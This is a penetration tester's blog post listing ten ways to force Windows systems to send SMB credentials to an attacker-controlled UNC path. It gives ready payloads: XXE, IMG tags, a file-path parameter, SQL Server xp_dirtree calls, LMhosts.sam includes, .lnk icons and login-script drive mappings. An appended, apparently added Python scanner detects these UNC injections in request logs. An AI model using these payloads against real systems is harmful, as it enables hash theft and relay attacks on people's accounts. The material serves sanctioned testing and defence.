10 Places To Stick Your UNC Path

Recently there was a big fuss over the "Redirect to SMB" blog that was published by Brian Wallace. Personally, I think that the recent scare over this vulnerability is a little overstated, but it could be a useful way to capture an SMB hash. I was already in the process of putting together this list, so here's a bunch of other ways that you can force a UNC path and capture credentials.
UNC paths are one of my favorite things to use during a pen test. Once I force an account to authenticate to me over SMB, I have two options: capture and crack the hash, or relay the hash on to another computer. Plenty has been written about both options, so we won't cover that here. The methods outlined below should give you some options for where you can use UNC paths to force authentication back to your attacking box. Firewall rules and file restrictions can really mess up some of these, so your mileage may vary.
For demo purposes, we will be using "\\192.168.1.123\test" as our listening UNC path / SMB server.

1. XML External Entity Injection

External entity injection can be a really handy way to read files off of a remote system, but if that server happens to be a Windows system, you can use a UNC path.
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]> <foo>&xxe;</foo>
Antti Rantasaari from NetSPI has been doing some really cool work in this space, so check out his blogs for more info.

2. Broken IMG Tags

Using a UNC path for an IMG tag can be pretty useful. Depending on where your SMB listener is (on the internal network) and what browser the victim is using (IE), there's a chance that the browser will just send the hash over automatically. These can also be embedded anywhere that may process HTML (email, thick apps, etc.).
"Internet Explorer's Intranet zone security setting must be set to Automatic logon only in Intranet zone. This is the default setting for Internet Explorer." (Source)
<img src=\\192.168.1.123\test.gif>

3. Directory Traversals

I wrote about this a while back, but web applications that allow you to specify a file path may be vulnerable to UNC path injection. By inputting a UNC path (instead of your typical ..\..\ or C:\ directory traversal), you may be able to capture the credentials for the service account that runs the web application.
Change the Id parameter in this URL:
  • http://test.example.com/Print/FileReader.aspx?Id=/reports/test.pdf&Type=pdf
To this:
  • http://test.example.com/Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf

4. Database Queries/injections

My co-worker, Scott Sutherland, wrote about using built-in SQL Server procedures to do SMB relay attacks. This one can be really handy if you have databases that allow the "domain users" group to authenticate. It's surprising to see how many database servers are running with domain admin service accounts. Just use the xp_dirtree or xp_fileexist stored procedures and point them at your SMB capture server.
xp_dirtree '\\192.168.1.123\'
xp_fileexist '\\192.168.1.123\'
There are a bunch more SQL procedures out there that you could potentially use, but these two are pretty reliable. Anytime you can read a file in SQL, you can probably use a UNC path in it.
This attack also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module can do it, and there's a great blog about Oracle SMB relay on the ERPScan blog.

5. File Shares

If you have write access to a file share, you have a couple of options for getting hashes.
  1. Here's a great one from Mubix - modify the icon path of .lnk shortcut links to a UNC path.
  2. Microsoft Word documents can also be modded with Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC paths into the documents.

6. Drive Mapping on Login

This may be overkill, but it could be handy for persistence. By modding whatever scripts are used to map network drives for users, you can add your own UNC path in as an additional drive to map. This is handy, as any users who have this drive added will send you credentials every time they log in. If you don't have rights to overwrite the startup scripts, GDS Security has a nice blog about setting this up with Metasploit and spoofing the startup script server.

7. Thick Applications

Basically anywhere that you can tell an app to load a file, you can potentially add in a UNC path. We have seen many file upload dialogs in thick applications that allow this. This is even better with hosted thick client applications that are running under the context of a terminal server user (and not the application user). This can also be really handy for kiosk applications. For more thick app breakouts, check out Scott's "Breaking Out!" blog.

8. The LMhosts.sam file

Mubix has a couple of great UNC tricks in his "AT is the new black" presentation. I already called out the .lnk files up above, but by modifying the LMhosts.sam file, you can sneak in a UNC path that forces the user to load a remote hosts file. Here's a sample LMhosts.sam using our UNC path (each directive goes on its own line):
192.168.1.123    netspi    #PRE
#BEGIN_ALTERNATE
#INCLUDE \\netspi\test\hosts.txt
#END_ALTERNATE

9. SharePoint

On many of our pen tests, we get access to accounts that can edit everybody's favorite intranet site, SharePoint. Using any of the other listed methods, you should be able to drop files or direct UNC links on the SharePoint site. Just make sure you go back and clean up the page(s) when you're done.

10. ARP spoofing - Ettercap filters

There are tons of fun things that you can do with Ettercap filters. One of those things is overwriting content with UNC paths. By injecting a UNC path into someone's HTML document, clear text SQL query, or any of the protocols mentioned above, you should be able to get them to authenticate back to your attacking machine.

Honorable Mention:

11. Redirect to SMB

For what it's worth, this issue has been out for a really long time. Basically, you get your victim to visit your malicious HTTP server and you 302 redirect them to a UNC file location. If the browser (or program making the HTTP request) automatically authenticates, then the victim will send their hash over to the UNC location. Some of the methods above (see XXE) allow for this if you use an HTTP path instead of the UNC path.
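From the blue-team side, the injection forms from sections 1, 3, 4 and 11 all leave the same fingerprint: a UNC path (\\host\share or //host/share) or a file:// URI pointing at a host, often URL-encoded. The following Python scanner is an added example and not code from the original post; it assumes it is fed logged request lines or raw parameter values (the log format and parameter names are assumptions), decodes them, pulls out the target host and labels it as a private address, a public address or a name, so that a UNC target outside the expected internal range stands out.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed patterns for the UNC forms discussed on this page:
#   \\host\share          (img src, xp_dirtree, .lnk icons, LMhosts)
#   //host/share          (the same path with forward slashes)
#   file:////host/share   (the XXE and Redirect-to-SMB variants)
# The "//" form must not follow ":" so that http://example.com is not flagged.
UNC_RE = re.compile(r'(?:\\\\|(?<!:)//)([A-Za-z0-9][A-Za-z0-9._-]*)[\\/]')
FILE_URI_RE = re.compile(r'file:/{2,4}([A-Za-z0-9][A-Za-z0-9._-]*)[\\/]', re.IGNORECASE)


def normalize(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so %5C%5C and double-encoded %255C%255C both surface."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_host(host: str) -> str:
    """Label the UNC target: 'private' (RFC1918/loopback IP), 'public' IP, or 'name'."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "name"
    return "private" if ip.is_private else "public"


def find_unc_targets(value: str) -> list[tuple[str, str]]:
    """Return (host, classification) for every UNC-style target in one value."""
    text = normalize(value)
    hosts: list[str] = []
    for pattern in (FILE_URI_RE, UNC_RE):
        for match in pattern.finditer(text):
            host = match.group(1).lower()
            if host not in hosts:
                hosts.append(host)
    return [(h, classify_host(h)) for h in hosts]


def scan_request(request_line: str) -> dict[str, list[tuple[str, str]]]:
    """Check every query parameter of a logged 'METHOD /path?query HTTP/1.1' line."""
    url = request_line.split()[1] if " " in request_line else request_line
    findings = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = find_unc_targets(raw)
        if hits:
            findings[name] = hits
    return findings
```

Running scan_request over the FileReader.aspx request from section 3 flags the Id parameter, while the legitimate /reports/test.pdf value and ordinary http:// URLs produce no findings.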

Conclusion

I'm sure that there's a couple that I missed here, but feel free to add them in the comments.